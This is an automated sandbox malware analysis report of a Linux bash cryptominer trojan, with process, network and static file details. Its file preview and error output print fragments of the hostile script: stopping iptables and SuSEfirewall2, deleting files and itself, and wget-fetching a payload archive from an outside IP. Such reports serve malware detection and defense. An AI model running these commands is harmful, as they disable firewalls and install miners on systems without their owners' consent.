Analysis Report L1fyFAYhE5
Overview
General Information |
|---|
| Joe Sandbox Version: | 24.0.0 |
| Analysis ID: | 678655 |
| Start date: | 03.10.2018 |
| Start time: | 10:48:00 |
| Joe Sandbox Product: | Cloud |
| Overall analysis duration: | 0h 4m 59s |
| Hypervisor based Inspection enabled: | false |
| Report type: | full |
| Sample file name: | L1fyFAYhE5 |
| Cookbook file name: | defaultlinuxfilecookbook.jbs |
| Analysis system description: | Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171) |
| Detection: | MAL |
| Classification: | mal60.troj.evad.mine.lin@0/0@0/0 |
Detection |
|---|
| Strategy | Score | Range | Reporting | Detection | |
|---|---|---|---|---|---|
| Threshold | 60 | 0 - 100 | Report FP / FN | ||
Classification |
|---|
Signature Overview |
|---|
Click to jump to signature section
Bitcoin Miner: |
|---|
| Found strings related to Crypto-Mining | Show sources | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
Networking: |
|---|
| Detected TCP or UDP traffic on non-standard ports | Show sources | ||
| Source: | TCP traffic: | ||
| Tries to stop the "iptables" service | Show sources | ||
| Source: | Systemctl executable stopping iptables: | ||
| Source: | Systemctl executable stopping iptables: | ||
| Connects to IPs without corresponding DNS lookups | Show sources | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Executes the "wget" command typically used for HTTP/S downloading | Show sources | ||
| Source: | Wget executable: | ||
| Urls found in memory or binary data | Show sources | ||
| Source: | String found in binary or memory: | ||
System Summary: |
|---|
| Sample contains strings that are potentially command strings | Show sources | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Source: | Potential command found: | ||
| Classification label | Show sources | ||
| Source: | Classification label: | ||
Persistence and Installation Behavior: |
|---|
| Executes the "rm" command used to delete files or directories | Show sources | ||
| Source: | Rm executable: | ||
| Source: | Rm executable: | ||
| Source: | Rm executable: | ||
| Source: | Rm executable: | ||
| Tries to stop the "iptables" service | Show sources | ||
| Source: | Systemctl executable stopping iptables: | ||
| Source: | Systemctl executable stopping iptables: | ||
| Creates hidden files and/or directories | Show sources | ||
| Source: | Directory: | ||
| Enumerates processes within the "proc" file system | Show sources | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Source: | File opened: | ||
| Executes the "grep" command used to find patterns in files or piped streams | Show sources | ||
| Source: | Grep executable: | ||
| Source: | Grep executable: | ||
| Executes the "mkdir" command used to create folders | Show sources | ||
| Source: | Mkdir executable: | ||
| Executes the "ps" command used to list the status of processes | Show sources | ||
| Source: | Ps executable: | ||
| Executes the "systemctl" command used for controlling the systemd system and service manager | Show sources | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Source: | Systemctl executable: | ||
| Executes the "wget" command typically used for HTTP/S downloading | Show sources | ||
| Source: | Wget executable: | ||
| Reads system information from the proc file system | Show sources | ||
| Source: | Reads from proc file: | ||
| Source: | Reads from proc file: | ||
Hooking and other Techniques for Hiding and Protection: |
|---|
| Sample deletes itself | Show sources | ||
| Source: | File: | ||
Runtime Messages |
|---|
| Command: | bash "/tmp/L1fyFAYhE5" |
| Exit Code: | |
| Exit Code Info: | |
| Killed: | True |
| Standard Output: | |
| Standard Error: | /tmp/L1fyFAYhE5: line 1: #!/bin/bash: No such file or directory /tmp/L1fyFAYhE5: line 2: /etc/init.d/iptables: No such file or directory Failed to stop iptables.service: Unit iptables.service not loaded. /tmp/L1fyFAYhE5: line 4: SuSEfirewall2: command not found /tmp/L1fyFAYhE5: line 5: reSuSEfirewall2: command not found --2018-10-03 12:49:11-- http://115.236.92.99:54321/mall.tar.gz |
Behavior Graph |
|---|
Yara Overview |
|---|
Antivirus Detection |
|---|
Initial Sample |
|---|
| No Antivirus matches |
|---|
Dropped Files |
|---|
| No Antivirus matches |
|---|
Domains |
|---|
| No Antivirus matches |
|---|
URLs |
|---|
| No Antivirus matches |
|---|
Startup |
|---|
|
Created / dropped Files |
|---|
| No created / dropped files found |
|---|
Domains and IPs |
|---|
Contacted Domains |
|---|
| No contacted domains info |
|---|
URLs from Memory and Binaries |
|---|
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| false | unknown |
Contacted IPs |
|---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
|---|
| IP | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 115.236.92.99 | China | 4134 | CHINANET-BACKBONENo31Jin-rongStreetCN | true |
Static File Info |
|---|
General | |
|---|---|
| File type: | |
| Entropy (8bit): | 5.528162830997711 |
| TrID: |
|
| File name: | L1fyFAYhE5 |
| File size: | 2014 |
| MD5: | 94bfedc1dd3a8e3760fca3229a573464 |
| SHA1: | 483573dbbd40e0af67e18b67105cbd4af7d2e5f9 |
| SHA256: | e094df700e7c3523fffcaafe55b26ec52dc0c123a5e2e0779904b42f9d8d0739 |
| SHA512: | 70a6621079189ed11a61495aeeb84f63ad29f39689f312334efad7174b44e815fd232cb599e369bbd5f2050a47000f337a1f9236d45ed6a63139d6db9d713c4c |
| File Content Preview: | ...#!/bin/bash./etc/init.d/iptables stop.service iptables stop.SuSEfirewall2 stop.reSuSEfirewall2 stop.rm -f /tmp/httpdlog/*.gz.rm -f *.gz.rm -f *.sh.rm -f $0.ret=`ps -ef|grep 45UmGzutvMrfwgtBdzNUMi4EwZXVmhQTVHnuM7Pom6VYL84o5bhVX1PZ4DZ3wrkYRYjcHRnRkeGv8Y |
Network Behavior |
|---|
Network Port Distribution |
|---|
TCP Packets |
|---|
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Okt 3, 2018 10:49:13.030000925 MESZ | 44274 | 54321 | 192.168.1.100 | 115.236.92.99 |
| Okt 3, 2018 10:49:14.026628017 MESZ | 44274 | 54321 | 192.168.1.100 | 115.236.92.99 |
| Okt 3, 2018 10:49:16.030488968 MESZ | 44274 | 54321 | 192.168.1.100 | 115.236.92.99 |
| Okt 3, 2018 10:49:20.038564920 MESZ | 44274 | 54321 | 192.168.1.100 | 115.236.92.99 |
| Okt 3, 2018 10:49:28.054533958 MESZ | 44274 | 54321 | 192.168.1.100 | 115.236.92.99 |
| Okt 3, 2018 10:49:44.070491076 MESZ | 44274 | 54321 | 192.168.1.100 | 115.236.92.99 |
| Okt 3, 2018 10:50:16.134579897 MESZ | 44274 | 54321 | 192.168.1.100 | 115.236.92.99 |
| Okt 3, 2018 10:52:23.213716030 MESZ | 60815 | 53 | 192.168.1.100 | 8.8.8.8 |
| Okt 3, 2018 10:52:23.214348078 MESZ | 39029 | 53 | 192.168.1.100 | 8.8.8.8 |
| Okt 3, 2018 10:52:23.226145029 MESZ | 53 | 60815 | 8.8.8.8 | 192.168.1.100 |
| Okt 3, 2018 10:52:23.226608992 MESZ | 53 | 39029 | 8.8.8.8 | 192.168.1.100 |
UDP Packets |
|---|
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Okt 3, 2018 10:52:23.213716030 MESZ | 60815 | 53 | 192.168.1.100 | 8.8.8.8 |
| Okt 3, 2018 10:52:23.214348078 MESZ | 39029 | 53 | 192.168.1.100 | 8.8.8.8 |
| Okt 3, 2018 10:52:23.226145029 MESZ | 53 | 60815 | 8.8.8.8 | 192.168.1.100 |
| Okt 3, 2018 10:52:23.226608992 MESZ | 53 | 39029 | 8.8.8.8 | 192.168.1.100 |
System Behavior |
|---|
General |
|---|
| Start time: | 10:49:10 |
| Start date: | 03/10/2018 |
| Path: | /bin/bash |
| Arguments: | /bin/bash /tmp/L1fyFAYhE5 |
| File size: | 1037528 bytes |
| MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
|---|
| Start time: | 10:49:10 |
| Start date: | 03/10/2018 |
| Path: | /bin/bash |
| Arguments: | n/a |
| File size: | 1037528 bytes |
| MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
|---|
| Start time: | 10:49:10 |
| Start date: | 03/10/2018 |
| Path: | /bin/bash |
| Arguments: | n/a |
| File size: | 1037528 bytes |
| MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
|---|
| Start time: | 10:49:10 |
| Start date: | 03/10/2018 |
| Path: | /bin/bash |
| Arguments: | n/a |
| File size: | 1037528 bytes |
| MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
|---|
| Start time: | 10:49:10 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | /bin/sh /usr/sbin/service iptables stop |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:10 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:10 |
| Start date: | 03/10/2018 |
| Path: | /usr/bin/basename |
| Arguments: | basename /usr/sbin/service |
| File size: | 31408 bytes |
| MD5 hash: | fd7bba8b11b99ec7559f30226c79a729 |
General |
|---|
| Start time: | 10:49:10 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:10 |
| Start date: | 03/10/2018 |
| Path: | /usr/bin/basename |
| Arguments: | basename /usr/sbin/service |
| File size: | 31408 bytes |
| MD5 hash: | fd7bba8b11b99ec7559f30226c79a729 |
General |
|---|
| Start time: | 10:49:10 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:10 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl --quiet is-active multi-user.target |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:10 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:10 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:10 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl list-unit-files --full --type=socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:10 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:10 |
| Start date: | 03/10/2018 |
| Path: | /bin/sed |
| Arguments: | sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p |
| File size: | 73424 bytes |
| MD5 hash: | c1a00c583ba08e728b10f3f46f5776d6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl -p Triggers show acpid.socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl -p Triggers show apport-forward.socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl -p Triggers show avahi-daemon.socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl -p Triggers show cups.socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl -p Triggers show dbus.socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl -p Triggers show dm-event.socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl -p Triggers show lvm2-lvmetad.socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl -p Triggers show lvm2-lvmpolld.socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl -p Triggers show lxd.socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl -p Triggers show saned.socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl -p Triggers show snapd.socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl -p Triggers show ssh.socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl -p Triggers show syslog.socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl -p Triggers show systemd-bus-proxyd.socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl -p Triggers show systemd-fsckd.socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl -p Triggers show systemd-initctl.socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl -p Triggers show systemd-journald-audit.socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl -p Triggers show systemd-journald-dev-log.socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl -p Triggers show systemd-journald.socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl -p Triggers show systemd-networkd.socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl -p Triggers show systemd-rfkill.socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl -p Triggers show systemd-udevd-control.socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl -p Triggers show systemd-udevd-kernel.socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /usr/sbin/service |
| Arguments: | n/a |
| File size: | 10057 bytes |
| MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl -p Triggers show uuidd.socket |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/systemctl |
| Arguments: | systemctl stop iptables.service |
| File size: | 659848 bytes |
| MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/bash |
| Arguments: | n/a |
| File size: | 1037528 bytes |
| MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/bash |
| Arguments: | n/a |
| File size: | 1037528 bytes |
| MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/bash |
| Arguments: | n/a |
| File size: | 1037528 bytes |
| MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/rm |
| Arguments: | rm -f /tmp/httpdlog/*.gz |
| File size: | 60272 bytes |
| MD5 hash: | b79876063d894c449856cca508ecca7f |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/bash |
| Arguments: | n/a |
| File size: | 1037528 bytes |
| MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/rm |
| Arguments: | rm -f *.gz |
| File size: | 60272 bytes |
| MD5 hash: | b79876063d894c449856cca508ecca7f |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/bash |
| Arguments: | n/a |
| File size: | 1037528 bytes |
| MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
|---|
| Start time: | 10:49:11 |
| Start date: | 03/10/2018 |
| Path: | /bin/rm |
| Arguments: | rm -f *.sh |
| File size: | 60272 bytes |
| MD5 hash: | b79876063d894c449856cca508ecca7f |
General |
